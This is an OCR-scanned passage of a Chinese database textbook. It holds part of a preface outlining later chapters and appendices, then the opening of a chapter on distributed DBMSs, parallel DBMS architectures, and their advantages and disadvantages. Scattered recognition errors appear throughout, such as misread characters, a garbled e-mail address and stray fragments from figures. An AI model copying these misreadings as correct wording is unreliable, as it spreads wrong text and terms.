法 规 对 数据 和 数据 库 管理 功能 有 何 影响 ， 等 等 。 

第 22 章 集中 讨论 了 数据 库 管理 系统 应 该 提供 的 三 种 功能 ， 即 事务 管理 、 并 发 控制 及 故 
障 恢复 。 这 些 技术 用 于 确保 当 多 个 用 户 访问 数据 库 或 出 现 硬件 / 软件 部 件 错误 时 数据 库 是 可 靠 
且 一 致 的 。 该 章 还 讨论 了 一 些 更 适合 于 长 寿 事务 的 高 级 事务 模型 ， 最 后 分 析 了 Oracle 中 的 事 
务 管理 。 

第 23 章 阐 述 查询 处 理 和 查询 优化 。 该 章 讨论 查询 优化 的 两 种 主要 技术 : 一 种 是 使 用 启 
发 式 规则 安排 查询 中 操作 的 顺序 ， 另 一 种 是 通过 比较 不 同 策略 的 相对 代价 选择 资源 耗费 最 少 
的 策略 。 最 后 分 析 了 Oracle 中 的 查询 处 理 。 


第 六 部 分 “分布 式 DBMS 与 复制 


第 六 部 分 阐述 分 布 式 DBMS。 分 布 式 DBMS 技术 是 当前 数据 库 系统 领域 一 个 主要 的 发 
展 方向 。 本 书 前 面 各 章 主要 介绍 集中 数据 库 系统 ， 即 由 单个 DBMS 控制 的 位 于 单个 节点 的 
单一 逻辑 数据 库 。 

第 24 章 讨论 分 布 式 DBMS 的 概念 与 问题 。 使 用 分 布 式 DBMS 时 ， 用 户 既 可 以 访问 自 
己 结 点 上 的 数据 库 ， 也 可 以 访问 存储 在 远程 结 点 上 的 数据 。 

第 25 章 阐述 与 分 布 式 DBMS 相关 的 各 个 高 级 概念 。 具 体 地 说 ， 重 点 阐述 与 分 布 式 事务 
管理 、 并 发 控制 、 死 锁 管 理 以 及 数据 库 恢 复 相关 的 协议 。 此 外 ， 还 讨论 了 X/Open 分 布 式 事 
务 处 理 (DTP) 协议 。 最 后 分 析 了 Oracle 中 的 数据 分 布 机制 。 

第 26 章 讨 论 利用 复制 服务 器 替代 分 布 式 DBMS 的 方案 以 及 与 移动 数据 库 相 关 的 问题 。 
该 章 也 分 析 了 Oracle 中 的 复制 机 制 。 


第 七 部 分 ”对象 DBMS 


本 书 前 面 各 章 都 在 关注 关系 模型 和 关系 系统 ， 其 原因 是 这 类 系统 在 当前 传统 业务 数据 库 
应 用 中 占据 主导 地 位 。 不 过 ， 关 系 系统 并 不 是 万 能 的 ， 在 数据 库 领域 发 展 面向 对 象 DBMS 
就 是 试图 克服 关系 系统 的 一 些 缺 陷 。 第 27 章 和 第 28 章 就 专门 叙述 这 一 方面 的 发 展 细节 。 

第 27 章 首先 引入 基于 对 象 的 DBMS (object-based DBMS ) 的 概念 ， 查 看 业已 出 现 的 各 
类 新 兴 的 数据 库 应 用 ， 说 明 关 系数 据 模型 因 其 种 种 弱点 而 对 这 些 新 兴 的 应 用 无 能 为 力 。 然 后 
讨论 面向 对 象 DBMS ( object-oriented DBMS ) 的 概念 ， 从 介绍 面向 对 象 数据 模型 及 持久 性 
编程 语言 开始 。 接 下 来 ， 分 析 通 常 DBMS 所 用 的 两 层 存 储 模 型 与 面向 对 象 DBMS 所 用 的 单 
层 存储 模型 的 区 别 及 对 数据 访问 的 影响 。 此 外 ， 还 讨论 了 提供 编程 语言 持久 性 的 不 同方 法 、 
指针 混 写 的 不 同 技术 、 版 本 控制 、 模 式 进 化 和 面向 对 象 DBMS 体系 结构 等 问题 。 该 章 也 简 
要 介绍 了 如 何 将 本 书 第 四 部 分 介绍 的 方法 学 推广 到 面向 对 象 DBMS 中 。 

第 28 章 介 绍 面向 对 象 管理 组 ( Object Data Management Group ，ODMG ) 推荐 的 新 的 对 
象 模型 ， 这 一 模型 已 成 为 面向 对 象 DBMS 的 事实 标准 。 该 章 还 介绍 了 一 个 商用 的 面向 对 象 
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数据 库 一 一 ObjectStore。 
第 八 部 分 Web 与 DBMS 


本 书 的 第 八 部 分 涉及 将 DBMS 集成 到 Web 环境 的 问题 ， 以 及 半 结 构 化 数据 及 其 与 
XML 的 关系 、XML 查询 语言 和 XML 到 数据 库 的 映射 。 

第 29 章 阐述 将 DBMS 集成 到 Web 环境 的 问题 。 首 先 简单 介绍 Internet 和 Web 技术， 
然后 说 明 Web 作为 数据 库 应 用 平台 的 适宜 性 ， 并 讨论 这 种 方法 的 优 缺 点 。 随 后 讨论 若干 
种 将 DBMS 集成 到 Web 环境 的 方法 ， 包 括 脚本 语言 、CGI、 服 务 器 扩展 、Java、ADO 和 
ADO.NET, 以 及 Oracle Internet Platform 。 

第 30 章 曾 述 半 结 构 化 数据 ， 然 后 讨论 XML 及 XML 如 何 成 为 Web 上 数据 表示 和 交 
换 的 流行 标准 。 该 章 讨论 XML 相关 技术 ， 如 名 字 空 间 、XSL、XPath、XPointer、XLink、 
SOAP、WSDL 和 UDDI， 等 等 。 该 章 还 阐述 怎样 用 XML 模式 定义 XML 文档 的 内 容 模型 ， 
以 及 怎样 用 资源 描述 框架 (RDF ) 为 元 数据 交换 提供 框架 。 此 外 ， 还 讨论 了 XML 的 查询 语 
言 ， 具体 集 中 在 由 W3C 提出 的 XQuery。 该 章 也 讨论 了 为 支持 XML 发 布 ， 或 更 广义 地 说 为 
在 数据 库 中 映射 和 存储 XML 而 对 SQL:2011 的 扩展 。 


第 九 部 分 “商务 智能 


本 书 的 最 后 一 部 分 考虑 与 商务 智能 有 关 的 主要 技术 ,包括 数据 仓库 、 联 机 分 析 处 理 
(OLAP) 和 数据 挖掘 。 

第 31 章 讨 论 数 据 仓 库 ， 包 括 它 的 定义 、 进 化 过 程 及 潜在 优 缺 点 。 该 章 阐 述 数据 仓库 的 
体系 结构 、 主 要 组 成 部 分 和 相关 工具 与 技术 ， 讨 论 数 据 集 市 及 其 开发 和 管理 的 有 关 问 题 。 此 
外 也 讨论 了 数据 仓库 中 与 时 态 数据 管理 关联 的 概念 及 实践 。 最 后 分 析 了 Oracle 中 的 数据 仓 
库 机 制 。 

第 32 章 提 供 了 设计 用 于 决策 支持 的 数据 仓库 和 数据 集 市 数据 库 的 方法 。 该 章 描述 了 维 
度 建 模 技术 的 基本 概念 并 将 其 与 传统 的 实体 - 联系 建 模 技 术 进 行 比较 ; 给 出 了 数据 仓库 设计 
方法 学 指南 ， 并 通过 扩展 的 DreamHome 案例 研究 说 明 如 何 实际 使 用 该 方法 学 。 该 章 最 后 说 
明 如 何 用 Oracle Warehouse Builder 设计 数据 仓库 。 

第 33 章 考 虑 联机 分 析 处 理 ( OLAP)。 首 先 讨论 了 何谓 OLAP 以 及 OLAP 应 用 的 主要 特 
性 ， 然 后 讨论 了 多 维 数据 的 表示 及 主要 的 OLAP 工具 ， 最 后 讨论 了 SQL 标准 针对 OLAP 的 
扩展 以 及 Oracle 对 OLAP 的 支持 。 

第 34 章 考 虑 数据 挖掘 (DM)。 首 先 讨 论 了 何谓 DM 以 及 DM 应 用 的 主要 特性 ， 然 后 
讨论 了 数据 挖掘 操作 的 主要 特性 和 相关 技术 ， 最 后 描述 了 DM 过 程 和 DM 工具 的 主要 特性 ， 
以 及 Oracle 对 DM 的 支持 。 


附录 


附录 A 给 出 DreamHome 案例 研究 的 说 明 ， 它 将 在 全 书 通 篇 使 用 。 

附录 B 给 出 另外 三 个 案例 研究 ， 供 学 生 课 程 设计 时 选用 。 

附录 C 给 出 有 别 于 UML 的 另外 两 种 建 模 表示 法 ， 即 Chen 氏 表示 方法 和 Crow Feet 表 
示 方 法 。 

附录 D 总 结 了 第 16 ~ 19 章 讨论 的 概念 、 人 逻辑 和 物理 数据 库 设 计 方法 学 。 
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附录 EE 简单 介绍 用 C# 实现 的 一 个 称 为 Pyrrho 的 轻 量 级 RDBMS， 它 能 说 明 本 书 讨论 的 
许多 概念 ， 还 能 下 载 使 用 。 
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附录 F 介绍 文件 组 织 和 存储 结构 的 相关 概念 ， 它 们 对 理解 第 18 章 讨论 的 物理 数据 库 设 
计 和 第 23 章 讨论 的 查询 处 理 是 必要 的 。 

附录 G 给 出 Codd 的 关于 关系 DBMS 的 12 条 规则 ， 它 是 鉴别 关系 DBMS 的 标准 。 

附录 H 介绍 了 两 种 最 常用 的 商用 关系 DBMS : Microsoft Office Access 和 Oracle。 在 本 
书 的 许多 章节 中 ， 都 涵盖 这 两 种 DBMS 如 何 实现 各 种 机 制 的 内 容 ， 例 如 安全 和 查询 处 理 等 。 

附录 1 借助 C 语 言 示 例 程序 说 明 舱 入 式 和 动态 SQL， 还 介绍 了 开放 数据 库 互 连 
(ODBC)， 这 一 标准 现在 已 经 成 为 访问 异 构 SQL 数据 库 的 业界 标准 。 

附录 J 讨论 如 何 估 计 Oracle 数据 库 的 磁盘 空间 需求 。 

附录 K 概述 面向 对 象 的 主要 概念 。 

附录 上 提供 若干 Web 脚本 示例 ， 补 充 第 29 章 关 于 Web 和 DBMS 的 讨论 。 

附录 M 介绍 交互 式 查 询 语言 QBE (举例 查询 )， 对 于 非 专业 用 户 来 说 ， 它 是 访问 数据 库 
时 最 易 使 用 的 语言 之 一 。 附 录 中 将 使 用 Microsoft Office Access 来 说 明 QBE 的 用 法 。 

附录 N 给 出 第 三 代 DBMS 宣言 。 

附录 O 介绍 Postgres， 它 是 一 个 早期 的 对 象 关系 DBMS。 

本 书 的 逻辑 组 织 及 建议 的 阅读 路 线 见 图 0-1。 


纠 错 和 建议 


如 此 大 部 头 的 一 本 教材 难免 出 现 错 误 、 分 歧 、 遗 漏 和 混乱 ， 县 请 各 位 读者 为 未 来 的 再 版 
和 编辑 留 下 你 的 意见 。 任 何 建议 、 纠 错 和 建设 性 意见 都 可 发 邮件 告诉 我 : thomas.connolly@ 


UwWS.ac.UKk。 
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本 章 我 们 主要 学 习 : 
e 分 布 式 数据 库 的 必要 性 
分 布 式 DBMS 与 分 布 式 处 理 、 并 行 DBMS 之 间 的 区 别 
分 布 式 DBMS 的 优 缺 点 
分 布 式 DBMS 中 的 异 构 问 题 
基本 的 网 络 概念 
分 布 式 DBMS 应 有 的 功能 
分 布 式 DBMS 体系 结构 
分 布 式 数据 库 设计 涉及 的 主要 问题 分 段 、 复 制 和 分 配 
怎样 分 段 
在 分 布 式 数 据 库 中 分 配 和 复制 的 重要 性 
分 布 式 DBMS 应 提供 的 透明 性 
分 布 式 DBMS 的 对 比 标准 


早期 的 数据 处 理 要 求 每 个 应 用 都 必须 自己 定义 和 维护 数据 ， 正 是 数据 库 技术 的 出 现 ， 使 
我 们 可 以 集中 地 定义 和 管理 所 有 数据 。 然 而 近年 来 ， 网 络 和 数据 通信 技术 迅猛 发 展 ， 表 现 为 
Internet、 移 动 与 无 线 计算 、 智 能 设备 和 网 格 计算 等 技术 的 不 断 涌 现 。 如 今 ， 作 为 这 两 类 技 
术 的 结合 物 一 一 分 布 式 数据 库 技 术 ， 又 将 工作 的 模式 由 集中 转化 为 分 散 ， 并 且 这 种 组 合 技术 
正成 为 数据 库 系统 领域 的 一 个 主要 发 展 方向 。 

在 前 面 的 章节 中 ， 主 要 讨论 的 是 集中 式 数据 库 系统 。 这 类 系统 的 特点 是 在 一 个 结 点 上 
只 有 一 个 单独 的 逻辑 数据 库 ， 并 且 由 一 个 单独 的 数据 库 管 理 系统 (DBMS ) 控制 。 本 章 将 介 
绍 分 布 式 数据 库 管 理 系统 ( Distributed Database Management System，DDBMS ) 的 概念 和 相 
关 问 题 。 在 这 类 系统 中 ， 用 户 不 仅 可 以 访问 本 地 结 点 上 的 数据 ， 而 且 可 以 访问 远程 结 点 上 的 
数据 。 有 预言 宣称 ， 当 各 组 织 机 构 都 步 人 分 布 式 DBMS 时 代 后 ， 集 中 式 DBMS 将 成 为 “ 老 
古董 ”。 


| 本 章 结 构 

24.1 节 将 介绍 DDBMS 的 基本 概念 ，DDBMS 与 分 布 式 处 理 、 并 行 DBMS 之 间 的 区 别 。 
24.2 节 将 简要 介绍 网 络 技术 ， 以 帮助 阐明 后 续 的 一 些 问 题 。24.3 节 将 讨论 期 望 DDBMS 扩展 
的 功能 以 及 如 何 将 第 2 章 介绍 的 ANSI-SPARC 体系 结构 扩展 为 DDBMS 参考 结构 。24.4 节 
讨论 在 数据 分 布 的 情况 下 ， 如 何 扩展 本 书 第 四 部 分 介绍 的 数据 库 设计 方法 学 。24.5 节 讨 论 期 
望 DDBMS 提供 的 透明 性 。 最 后 ，24.6 节 简 要 回顾 Date 关于 DDBMS 的 12 条 规则 。 本 章 中 
的 例子 仍 取 自 于 11.4 节 和 附录 A 中 具体 描述 的 DreamHome 案例 。 
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在 下 一 章 中 ， 将 研究 如 何 扩展 第 22 章 中 讨论 的 并 发 控制 协议 、 死 锁 管理 和 恢复 控制 以 
适应 分 布 式 环境 。 在 第 26 章 将 讨论 复制 服务 器 和 移动 数据 库 ， 后 者 是 另 一 种 潜在 的 、 更 加 
简化 的 实现 数据 分 布 的 方法 ， 最 后 将 介绍 Oracle 如 何 支 持 数 据 复 制 和 移动 。 


24.1 引言 


推动 数据 库 系统 发 展 的 一 个 主要 因素 是 ， 人 们 希望 将 一 个 企业 的 运营 数据 集成 起 来 并 
提供 对 数据 的 受 控 访问 。 尽 管 集成 和 受 控 访问 可 能 意味 着 集中 管理 ,但 这 并 不 是 本 意 。 实 际 
上 ,计算 机 网 络 的 发 展 促进 了 分 散 式 的 作业 模式 。 而 这 种 分 散 的 方法 恰好 反映 了 许多 公司 的 
组 织 结构 ， 即 逻辑 上 可 分 成 多 个 分 公司 、 部 门 、 项 目 等 ， 物 理 上 分 为 办 公 室 、 车 间 、 工 厂 ， 
每 一 个 单元 都 维护 着 自己 的 运营 数据 ( Date，2000 )。 因 为 分 布 式 数据 库 系统 反映 了 上 述 组 
织 结构 ， 发 展 它 可 望 提高 数据 的 共享 和 数据 访问 效率 ， 它 使 得 每 个 单元 的 数据 都 可 访问 ， 并 
能 将 数据 存放 于 最 近 的 常用 位 置 上 。 

分 布 式 DBMS 有 助 于 解决 信息 孤岛 的 问题 。 一 个 个 数据 库 常 被 看 作 是 孤立 的 、 不 可 访 
问 的 电子 岛 ， 就 像 远 洋 上 的 小 岛 。 这 可 能 是 由 于 地 理 分 隔 、 计 算 机 体系 结构 不 兼容 或 通信 协 
议 不 兼容 等 原因 造成 的 。 当 把 数据 库 集 成 为 一 个 逻辑 整体 后 就 可 能 不 再 有 这 种 看 法 。 


24.1.1 概念 

在 开始 讨论 分 布 式 DBMS 之 前 ， 先 给 出 分 布 式 数据 库 的 定义 。 
| 分 布 式 数据 库 | 物理 上 分 布 于 计算 机 网 络 、 还 辑 上 相互 关联 的 共享 数据 (和 数据 描述 ) 集 。 
| 分 布 式 DBMS | 管理 分 布 式 数据 库 并 对 用 户 提供 分 布 透明 性 的 软件 系统 。 


分 布 式 数据 库 管理 系统 (DDBMS) 由 一 个 被 分 为 若干 段 (fragment) 的 逻辑 数据 库 构成 。 
每 个 段 由 一 个 DBMS 控制 ， 可 以 存储 在 一 或 多 个 通过 通信 网 络 互联 起 来 的 计算 机 上 。 每 一 
个 结 点 都 可 以 独立 地 处 理 用 户 访问 本 地 数据 的 请 求 ( 即 每 个 结 点 都 有 一 定 的 本 地 自治 性 )， 
并 且 也 可 以 处 理 存储 在 网 络 上 其 他 计算 机 中 的 数据 。 

用 户 通过 应 用 来 访问 分 布 式 数据 库 。 应 用 进一步 分 为 不 需要 从 其 他 结 点 获得 数据 的 应 用 
(本 地 应 用 ) 和 确实 需要 从 其 他 结 点 获得 数据 的 应 用 (全 局 应 用 )。 一 般 要 求 DDBMS 至 少 包 
含 一 个 全 局 应 用 。 因 此 ，DDBMS 应 当 具 有 如 下 特征 : 

e 逻辑 上 相关 的 共享 数据 的 集合 。 
数据 分 段 。 

段 可 复制 。 

段 或 副本 分 配 在 各 个 结 点 上 。 

结 点 用 通信 网 络 连接 起 来 。 

每 个 结 点 的 数据 都 由 DBMS 控制 。 

每 个 结 点 的 DBMS 都 能 自治 地 处 理 本 地 应 用 。 

每 个 DBMS 至 少 参 与 一 个 全 局 应 用 。 

并 非 系统 中 每 个 结 点 都 必须 有 自己 的 本 地 数据 库 ， 图 24-1 显示 了 DDBMS 的 拓扑 结构 。 


| 例 24.1 罗 DreamHome 
DreamHome 将 使 用 分 布 式 数 据 库 技术 ， 在 多 个 分 立 的 计算 机 系统 上 实现 数据 库 系 统 ， 
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而 不 是 使 用 单个 集中 式 大 型 机 。 这 些 计算 机 系统 可 以 位 于 每 个 分 公司 当地 ， 例 如 ， 在 伦敦 、 
阿 伯 丁 和 格拉 斯 村。 连接 这 些 计算 机 的 网 络 可 以 使 各 个 分 公司 相互 通信 ， 而 DDBMS 使 它们 
可 以 访问 其 他 分 公司 存储 的 数据 。 这 样 ， 格 拉 斯 哥 的 用 户 就 可 以 通过 数据 库 查看 伦敦 有 哪些 
房产 可 租 ， 而 不 用 打 电 话 或 写 信 到 伦敦 分 公司 。 

换 旬 话说 ， 如 果 每 一 个 DreamHome 分 公司 都 有 自己 的 (不 同 的 ) 数据 库 ，DDBMS 可 
以 将 这 些 分 散 的 数据 库 综 合成 一 个 逻辑 数据 库 ， 同 时 也 可 以 使 本 地 的 数据 得 到 更 为 广泛 的 
利用 。 < 





图 24-1 分 布 式 数据 库 管 理 系 统 


从 DDBMS 的 定义 中 可 以 看 出 ， 系 统 期 望 分 布 性 对 用 户 透 明 ( 即 不 可 见 )。 这 样 ， 用 户 
就 不 需要 知道 分 布 式 数据 库 是 如 何 分 段 存 储 在 多 个 不 同 计算 机 上 以 及 可 能 被 复制 等 细节 。 透 
明 性 的 目的 就 是 要 使 用 户 使 用 分 布 式 系统 如 同 使 用 集中 式 系统 一 样 。 这 常常 被 称 为 DDBMS 
的 基本 原则 〈Date，1987b)。 这 个 要 求 为 终端 用 户 提供 了 强大 的 功能 ， 但 遗憾 的 是 ， 它 同时 
也 产生 了 一 些 其 他 问题 需要 DDBMS 来 解决 ，24.5 节 将 讨论 这 些 问题 。 

分 布 式 处 理 
将 分 布 式 DBMS 与 分 布 式 处 理 区 分 开 来 非常 重要 。 


| 分 布 式 处 理 | 一 个 可 以 通过 计算 机 网 络 来 访问 的 集中 式 数 据 库 。 


分 布 式 DBMS 定义 的 关键 点 在 于 该 系统 是 由 物理 上 分 布 于 网 络 各 个 结 点 上 的 数据 构成 
的 。 如 果 数 据 是 集中 式 的 ， 即 使 其 他 用 户 可 以 通过 网 络 来 访问 该 数据 ， 仍 然 不 能 认为 它 是 一 
个 分 布 式 DBMS， 而 仅仅 是 分 布 式 处 理 而 已 。 图 24-2 说 明了 分 布 式 处 理 的 拓扑 结构 。 比 较 
图 24-1 与 图 24-2， 可 以 看 出 图 24-2 中 的 结 点 2 有 一 个 集中 式 数 据 库 ， 而 图 24-1 中 多 个 结 
点 都 有 自己 的 数据 库 (DB )。 

并 行 DBMS 


同样 也 需要 区 分 分 布 式 DBMS 与 并 行 DBMS。 


并 行 DBMS | 运行 在 多 个 处 理 器 和 磁盘 上 的 DBMS， 可 用 来 尽 可 能 地 并 行 执行 多 个 操作 ， 
目 的 在 于 提高 性 能 。 
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并 行 DBMS 也 是 基于 这 样 一 个 前 提 ， 就 是 单 处 理 器 系统 不 再 能 够 满足 对 于 低 成 本 的 可 
扩展 性 、 可 靠 性 和 高 性 能 的 需求 。 不 同 于 单 处 理 器 
驱动 的 DBMS， 多 处 理 器 驱动 的 并 行 DBMS 是 一 种 
强 有 力 的 、 划 算 的 方案 。 并 行 DBMS 把 多 个 小 型 机 
连接 起 来 ， 以 获得 和 大 型 机 相同 的 吞吐 量 ， 并 且 比 
单 处理 器 DBMS 具有 更 强 的 可 扩展 性 和 可 靠 性 。 

为 了 使 多 个 处 理 器 能 正常 访问 同一 个 数据 库 ， 
并 行 DBMS 必须 提供 共享 资源 管理 。 哪 些 资 源 
共享 ? 如 何 实现 这 些 资源 的 共享 ? 这 些 问题 直接 
影响 到 系统 的 性 能 和 可 扩展 性 ， 而 系统 的 性 能 和 
可 扩展 性 又 决定 了 该 系统 是 否 适合 给 定 的 应 用 或 
环境 。 图 24-3 说 明了 并 行 DBMS 的 三 种 主要 体系 
结构 : 











结 点 3 
e 共享 存储 器 。 民 
。 北京 磁 失 。 24-2 分布 式 处 理 
e 无 共享 。 



































c ) 无 共享 
图 24-3 ”并行 数据 库 结构 
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共享 存储 器 (shared memory) 结构 是 一 种 紧 耦 合 结构 ， 该 结构 中 同一 系统 内 的 多 个 处 理 
器 共享 系统 内 存 。 就 像 我 们 所 熟知 的 对 称 多 处 理 机 ( SMP)， 这 种 体系 结构 从 小 到 只 有 几 个 
微 处 理 器 并 行 工 作 的 个 人 工作 站 到 基于 RISC ( Reduced Instruction Set Computer， 精 简 指 令 
集 计 算 机 ) 的 大 型 机 器 ， 甚 至 到 巨型 机 都 有 着 广泛 应 用 。 这 种 结构 只 能 为 有 限 个 数 的 处 理 器 
提供 高 速 的 数据 访问 ， 当 处 理 器 个 数 超过 64 时 ， 处 理 器 之 间 的 互连网 络 就 会 成 为 系统 性 能 
的 瓶颈 。 

共享 磁盘 (shared disk) 结构 是 一 种 松 耦 合 结构 ， 这 种 结构 有 利于 内 部 相对 集中 并 且 需 
要 高 可 用 性 和 高 性 能 的 一 类 应 用 。 在 这 种 结构 下 ， 每 个 处 理 器 都 能 直接 访问 所 有 的 磁盘 ， 但 
它们 都 拥有 各 自 的 私有 内 存 。 与 无 共享 结构 一 样 ， 共 享 磁盘 结构 消除 了 共享 存储 器 结构 所 带 
来 的 系统 性 能 的 瓶颈 。 但 是 ， 与 无 共享 结构 不 同 的 是 ， 共 享 磁盘 系统 在 消除 瓶颈 时 并 没有 引 
和 人 由 于 物理 上 分 区 数据 带 来 的 开销 。 采 用 共享 磁盘 结构 的 系统 有 时 也 被 称 为 集群 (cluster)。 

无 共享 ( shared nothing) 结构 经 常 被 称 为 大 规模 并 行 处 理 (MPP)， 是 一 种 多 处 理 器 结 
构 ， 组 成 该 结构 的 每 一 个 处 理 器 都 有 自己 的 内 存 和 磁盘 存储 器 。 数 据 库 被 分 割 存 放 在 各 个 与 
数据 库 相 关 的 子 系 统 的 磁盘 上 ， 并 且 数 据 可 以 被 系统 的 所 有 用 户 透 明 地 使 用 。 这 种 结构 比 共 
享 存储 器 结构 具有 更 强 的 可 扩展 性 ， 并 能 更 轻松 地 支持 更 多 的 处 理 器 。 但 系统 性 能 只 有 当 所 
需 的 数据 均 为 本 地 数据 时 才 最 佳 。 

尽管 无 共享 结构 有 时 也 包括 了 分 布 式 DBMS， 但 并 行 DBMS 的 数据 分 布 主要 考虑 性 能 。 
此 外 ,分 布 式 DBMS 的 结 点 通常 为 地 理 上 分 布 、 分 别管 理 ， 并 且 通 过 相对 较 慢 的 网 络 互 连 ， 
而 并 行 DBMS 的 各 结 点 通常 处 于 同一 台 计算 机 或 同一 个 结 点 中 。 

并 行 技术 通常 用 于 容量 为 TB ( 10” 字 节 ) 级 的 超大 型 数据 库 ， 或 每 秒 钟 处 理 上 千 条 事 
务 的 系统 。 这 种 系统 需要 访问 大 容量 的 数据 ， 并且 必须 对 查询 及 时 响应 。 并 行 DBMS 能 利 
用 其 基本 体系 结构 ， 采 用 并 行 扫描 、 连 接 和 排序 技术 来 改进 复杂 查询 的 执行 性 能 ， 这 些 技术 
使 多 个 处 理 器 结 点 能 自动 地 分 担 工作 负荷 。 在 第 31 章 的 数据 仓库 中 将 进一步 探讨 这 种 结构 。 
值得 指出 的 是 ， 当 前 各 主要 的 DBMS 提供 商都 生产 并 行 版 本 的 数据 库 引 擎 。 


24.1.2 DDBMS 的 优 缺 点 


数据 分 布 以 及 应 用 分 布 比 传统 的 集中 式 数据 库 系统 更 具有 潜在 的 优势 ， 但 也 存在 着 不 
足 。 本 节 将 讨论 DDBMS 的 优 缺 点 。 
优点 

反映 了 组 织 机 构 的 结构 ”许多 组 织 机 构 都 是 自然 地 分 布 于 各 个 地 方 。 例 如 ，DreamHome 
在 许多 城市 都 设 有 分 公司 。 于 是 该 应 用 的 数据 库 将 很 自然 地 分 布 于 这 些 不 同 的 地 方 。 
DreamHome 的 每 个 分 公司 都 有 一 个 数据 库 用 来 记录 该 机 构 的 员工 信息 、 出 租房 产 信息 以 及 
房产 业主 的 信息 。 本 地 的 员工 可 以 在 本 地 数据 库 上 进行 本 地 查询 ， 而 公司 的 高 层 则 可 以 访问 
所 有 分 公司 的 任何 数据 ， 进 行 全 局 查询 。 

改进 了 共享 性 和 本 地 自治 性 ”一 个 组 织 机 构 在 地 理 上 的 分 布 可 以 在 数据 的 分 布 中 反映 出 
来 ， 而 一 个 结 点 的 用 户 可 以 访问 其 他 结 点 上 的 数据 。 数 据 会 存放 在 与 经 常 使 用 这 些 数据 的 用 
户 靠近 的 结 点 上 。 这 样 ， 用 户 就 可 以 对 数据 拥有 本 地 控制 权 ， 从 而 可 以 建立 和 执行 关于 使 用 
这 些 数据 的 本 地 策略 。 全 局 数据 管理 员 ( DBA) 对 整个 系统 负责 。 通 常 也 可 以 把 责任 部 分 地 
下 放 到 本 地 级 ， 所 以 本 地 DBA 可 以 管理 本 地 DBMS (参见 10.15 节 )。 

改进 了 可 用 性 ”对 于 集中 式 DBMS， 计算 机 的 一 次 故障 会 中 断 所 有 的 DBMS 操作 。 然 
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而 ,在 DDBMS 系统 中 ， 一 个 结 点 的 故障 或 通信 和 链 路 的 故障 只 会 使 某 些 结 点 不 能 被 访问 , 但 
绝 不 会 中 断 整个 系统 的 操作 。 分 布 式 DBMS 就 是 设计 用 来 使 系统 在 这 些 故障 发 生 时 仍然 可 
以 继续 工作 的 。 即 使 一 个 结 点 出 现 故障 ， 系 统 也 可 以 把 对 故障 结 点 的 访问 请 求 重 定向 到 其 他 
提高 了 可 靠 性 ”因为 数据 可 以 被 复制 到 多 个 结 点 上 ， 所 以 一 个 结 点 的 故障 或 通信 和 链 路 故 
障 不 会 妨碍 对 该 数据 的 访问 。 

改进 了 性 能 ”因为 数据 是 放置 在 离 “ 最 大 需求 ”最 近 的 结 点 上 的 ， 而 且 由 于 分 布 式 
DBMS 内 在 的 并 行 机 制 ， 所 以 访问 分 布 式 数据 库 的 速度 肯定 比 访问 远程 集中 式 数 据 库 要 快 。 
而 且 ， 由 于 每 个 结 点 都 只 处 理 整个 数据 库 系统 的 一 部 分 工作 ， 所 以 不 会 出 现 像 集 中 式 DBMS 
系统 中 那样 竞争 CPU 和 LO 服务 的 情况 。 

节约 成 本 ”20 世纪 60 年代， 计算 能 力 是 通过 设备 成 本 的 平方 来 衡量 的 : 3 倍 的 成 本 能 
产生 9 倍 的 能 力 。 这 就 是 著名 的 Grosch 定律 。 然 而 ， 现 在 通常 认为 用 相对 低 得 多 的 成 本 建 
立 的 小 型 计算 机 系统 就 能 够 获得 与 大 型 计算 机 相当 的 计算 能 力 。 这 将 使 各 个 合作 部 门 配备 独 
立 的 计算 机 更 为 经 济 。 而 且 在 网 络 中 添加 一 个 工作 站 也 会 比 升 级 大 型 计算 机 系统 更 加 经 济 。 

男 一 个 可 能 节约 开销 的 地 方 是 ， 若 应 用 要 求 访问 地 理 上 远离 的 分 布 数据 时 ， 在 网 络 中 传 
送 数据 所 需 的 开销 相对 本 地 访问 开销 要 大 得 多 。 因 此 对 应 用 进行 划分 ， 在 每 个 结 点 中 执行 一 
部 分 ， 开 销 将 会 变 少 。 

模块 化 增长 ”在 分 布 式 环境 中 ， 扩 展 显得 更 加 容易 一 些 。 新 结 点 可 以 添加 到 网 络 中 ， 而 
不 会 影响 其 他 结 点 的 操作 。 这 种 适应 性 使 得 组 织 机 构 的 扩展 相对 容易 一 些 。 可 以 通过 增强 
系统 的 处 理 和 存储 能 力 来 适应 日 益 增长 的 数据 库 规模 需要 。 集 中 式 DBMS 的 扩展 会 使 硬件 
和 软件 都 需要 升级 (硬件 升级 以 获得 更 强大 的 系统 ， 软 件 升 级 以 获得 更 强大 、 更 加 可 配置 的 
DBMS )。 

集成 度 高 本 节 一 开头 就 说 明 ， 集 成 而 不 是 集中 是 DBMS 的 一 个 主要 优点 。 遗 留 系统 
集成 就 是 一 个 实例 ， 说 明 某 些 组 织 机 构 内 部 不 得 不 依靠 分 布 式 数据 处 理 来 使 得 其 历史 遗留 系 
统 与 更 现代 的 系统 共存 。 与 此 同时 ， 当 今 已 没有 哪 一 个 软件 包 能 提供 组 织 机 构 所 需 的 所 有 功 
能 。 因 此 ， 组 织 机 构 具 备 集 成 来 自 不 同 厂 商 的 软件 产品 的 能 力 非常 重要 。 

保持 竞争 力 ”有 若干 新 的 技术 进展 强烈 依赖 于 分 布 式 数据 库 技术 ， 例 如 电子 商务 、 计 
算 机 支持 的 合作 、 工 作 流 管理 等 。 许 多 企业 不 得 不 重新 组 织 它们 的 业务 并 采用 分 布 式 数 据 库 
技术 来 保持 其 竞争 力 。 例 如 ， 由 于 Internet 的 出 现 ，DreamHome 如 果 不 支持 客户 在 线 看 房 ， 
就 会 失掉 一 部 分 市 场 。 
缺点 

复杂 性 高 分 布 式 DBMS 需要 对 用 户 隐 藏 其 分 布 式 的 本 质 ， 且 要 为 用 户 提供 令 人 满意 
的 性 能 、 可 靠 性 和 可 用 性 ， 这 就 注定 了 它 比 集中 式 DBMS 更 加 复杂 。 而 且 数 据 复制 更 进 一 
步 增加 了 分 布 式 DBMS 的 复杂 性 。 如 果 软 件 不 能 完善 地 处 理 数据 复制 ， 那 么 分 布 式 DBMS 
的 可 用 性 、 可 靠 性 和 性 能 相对 于 集中 式 DBMS 都 会 降低 。 此 时 ， 前 述 的 种 种 优点 就 会 变 成 
缺点 。 

成 本 高 复杂 性 的 增加 意味 着 获得 和 维护 DDBMS 的 成 本 会 比 集中 式 DBMS 更 高 。 而 
且 分 布 式 DBMS 需要 额外 的 硬件 开销 以 建立 连接 各 个 结 点 的 网 络 。 此 外 ， 分 布 式 DBMS 还 
